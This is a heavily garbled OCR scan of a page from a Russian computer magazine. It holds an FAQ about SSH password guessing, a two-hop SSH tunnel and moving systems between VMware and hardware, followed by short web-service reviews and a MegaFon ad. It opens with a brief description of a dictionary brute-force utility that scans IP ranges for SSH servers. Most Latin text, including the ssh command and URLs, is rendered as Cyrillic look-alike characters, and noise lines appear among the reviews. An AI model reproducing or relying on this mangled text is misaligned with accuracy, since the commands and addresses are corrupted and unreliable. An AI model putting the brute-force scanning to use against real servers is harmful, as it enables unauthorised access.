которая пытается отыскать пароль по словарю, 
ты можешь найти варианты утилиты, оптими- 
зированные на работу в несколько потоков, а 
также с возможностью поиска ББН-демонов в 
заданном диапазоне ІР-адресов 

0: Что такое «поднял 2х хоповый ббіі тунель 
(2-Нор ББГіІиппеІ)»? 

А:55Н очень часто используется кактранс- 
портный протокол для безопасной переда- 
чи данных между други ми приложениями, 
например, небезопасного ѴІЧС (удаленный 
рабочий стол). Однако бываютситуации, когда 
установить туннель невозможно: например, 
между двумя хостами нет возможности прямого 
подключения (банально из-за ограничений 
файрвола]. Однако если ввести некоторый 
хост, с которым подключение может установить 
каждая из сторон, то его можно использовать 
как посредника, воспользовавшись приемом 



КУ 




О 




іѵѵо бор іиппеііпд (или проще говоря — тун 
через дополнительный гейт]. 

Достигается это следующим образом: спе 
мы используем ззб для того чтобы перезфе- 
соватьтрафик на порттой машины, с которой 
возможноустановитьсоединение и далеі 
заставляем ее переадресовывать трафик на 
нужный нам хост (с которым для нее также 
возможен коннект]. В следующим примере мы 
будем осуществлять подключения с машины 
«туЬоте. ехатріе. огд», в качестве проме- 
жуточного хоста будет выступать «даіеѵѵау. 
ехатріе.сот», а в качестве желанной машины 
будет недоступный напрямую ББН-демон на 
«зегѵег.ехатріе.сот». 

Наша задача — создать двух-хоповый туннель. 
Для этого на машине «туЬоте. ехатріе. огд» 
мы запускаем команду: 



ззЪ. -і -Ы -Ь 5152 6 : зегѵег . ехатріе . 
сот: 22 -2 даСемау . ехатріе . сот 

Вот и все! В результате, ББН-подключения 
на 51526 порт на машине туботе.ехатріе. 
огд будут туннелироваться на нужный хост, т.е. 
зегѵег. ехатріе. сот. Другими словами, вместо 
невозможного напрямую соединения на зегѵег. 
ехатріе. сот:22, мы просто подключаемся на 
локальный хости порт 51 526, а всезаморочки 
возьмет на себя механизм 55Н. Кстати говоря, 
в качестве порта можно использовать и любой 
другой, ножелательно из диапазона 49152- 
65535 

0: Как перенести реальную систему в виртуаль- 
ное окружение ѴМѵѵаге? 

А: На этот случай командой ѴМѵѵаге разрабо- 
тана специальная утилита ѴМѵѵаге ѵСепІег 
Сопѵегіег ( ШрУ/ѵѵѵѵѵѵ.ѵтѵѵаге.сот/ргосІисІз/ 
сопуегіег]. Программа делает полный снимок 
системы и преобразует файлы виртуальной 
машины. 



0: А как перенести гостевую ОС из виртуального 
окружения на реальный физический компью- 
тер? 

А: Существует несколько способов. Следую- 
щий, пожалуй, является наиболееуниверсаль- 

НЫМ : 

1. Устанавливаем Бутапіес Васкир Ехес ( Ыір:// 
ѵѵѵѵѵѵ.зѵтапІес.сот/Ьизіпезз/Ьаскир-ехес-Іог- 
ѵѵіпсіоѵѵз-зегѵегз ). 

2. Далее делаем бэкап всей системы 

3. С помощью Васкир Ехес создаем ЮР — 
загрузочный восстановительный образ винды 
— Іпіеііедепі Оізазіег Ресоѵегу. 

4. Записываем полученный образ на СО. 

5. Загружаемся с СО, нажимая при загрузке 
<Е2> — Аиіотаіеб Бузіет Ресоѵегу. 

6. Далее начинается автоматическая установка 
винды. На последнем этапе установщик поп- 
росит подключиться кбэкап-серверу. Вводим 
логин-пароль и о чудо: установщик восста- 
навливает всю файловую стуктуру и состояние 
системы на момент бэкапа (реестр, настройки, 
службы и т.д.]. 

Готово! ЗИ 
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ДЛЯ БРУТФОРСА ПАРОЛЕЙ 
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ФАТАЛЬНАЯ ПАРАЛЛЕЛЬНЫЕ АЛЬТЕРНАТИВНЫЕ 

ОШИБКА ВЫЧИСЛЕНИЯ С ОБОЛОЧКИ ДЛЯ 

РАНДОМИЗАЦИИ ИСПОЛЬЗОВАНИЕМ УПРАВЛЕНИЯ БД 

ВРНР ВИДЕОКАРТЫ стр.24 
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ПОЛУЧИТЬ ІР-АДРЕС 
КОНКРЕТНОЙ СТРАНЫ 



ЗЫЛ 05іпч СШпдс ІР СоипСгѵІ 
ЕМЯГ «IV ЦИ. ДПЙ втн "бог 
ЦВХТ рм**>іекфр Ш 



ПпгЫій ЯЛК 

О киіііл'і ЯіЮіІг Лійі 
О РЛІЯЛ1 
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Сообщество изучающих английский 
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■м уг <4«п4іт 



СНАЫбЕІР&СОиЫТРУ 



ВАРЮ5ТЕР5 



НТТ Р://АМ0МУМІ2ЕР.МЫТІМЕІ РАРІР5ТЕР5.С0М 

сом 




Стандартный набор настроек веб-прокси — специальных сайтов, которые 
можно использовать в качестве посредника и не светить свой настоящий 
ІР — удивляет разнообразием. Их столько много, и всеони бесполезные. 
Совсем другое дело — сервис Сбапде ІР&СоипІгу. Все, что оттебя требу- 
ется, — это указать страну, ІР-адрес которой ты хочешь получить, и сайт, на 
который нужно перейти. А сервис позаботится, чтобы таконо и было 



Самый верный способ выучить иностранный язык — общаться на нем. 
РарісВіерз — это отечественный проект, который предлагает всем, изучаю- 
щим языки, набор сервисов для пополнения словарного запаса и общения 
друге другом. Упражнения на грамматику и увеличение словарного запаса, 
тематические дискуссии — все куслугам пользователей сайта. 
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ДЛЯ ЧТЕНИЯ 
ЖУРНАЛОВ ОЫЫЫЕ 



Потрясающая реализация онлайн просмотрщика РОР-докуменов. Поми- 
мо удачного интерфейса, реализованного на РІазЬ, и шустрой скорости 
работы, у Іззии естьещеодин важный плюс. Сервис изначально рассчи- 
тан на публикацию РОР-версий самых различныхжурналов, которые в 
огромном количестве сейчас и выкладываются на іззии. сот. Например, 
перейдя по ссылке ЫірУ/іззии.сот/бѵтз/босз/ха 99 01 . ты сможешь во 
всей красе оценить самый первый номера Пакера. 




ѴѴІ-РІ ТОЧКИ 



ДЛЯ ПОИСКА ѴѴІ-РІ 
ХОТСПОТА В ЛЮБОМ ГОРОДЕ 



МЛРІ4РВЕЕ.ВІІ 



Полезный сервис, который поможет найти и покажет на карте точки досту- 
па ѴѴі-Рі в самых разных городах России. На картах отмечены известные 
платные и бесплатные ѵѵі-б точки доступа, к каждой из которых можно ос- 
тавитьсвой комментарий. Приятно, чтоу сайта легкая мобильная версия, 
а также 5М5-сервис, который по текущему адресу присылает расположен 
ния ближайшего хотспота. 
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«Музыкальный Эксперт» 



Новая услуга в твоем телефоне позволит тебе быстро распознать 
понравившуюся музыкальную композицию и узнать имя исполнителя. 



«Музыкальный Эксперт» - это новая услуга МегаФона, которая позволит тебе определить имя исполнителя 
и название звучащей музыкальной композиции в режиме реального времени. 

Специальная программа анализирует звуковой спектр музыкальной композиции, сравнивает его 
с известными записями и распознает до 95% существующих в мире треков. Для сравнения программа 
использует более 5 миллионов музыкальных композиций, содержащихся в постоянно обновляемой 
международной базе данных. 

Позвони на номер 0665, поднеси телефон к источнику звука - и вскоре ты получишь СМС с информацией* 
о музыкальной композиции. 



@0665 (Т) мегафон 

* Стоимость запроса 25 рублей (с учетом НДС). Будущее ЗЗВИСИТ ОТ тебя 




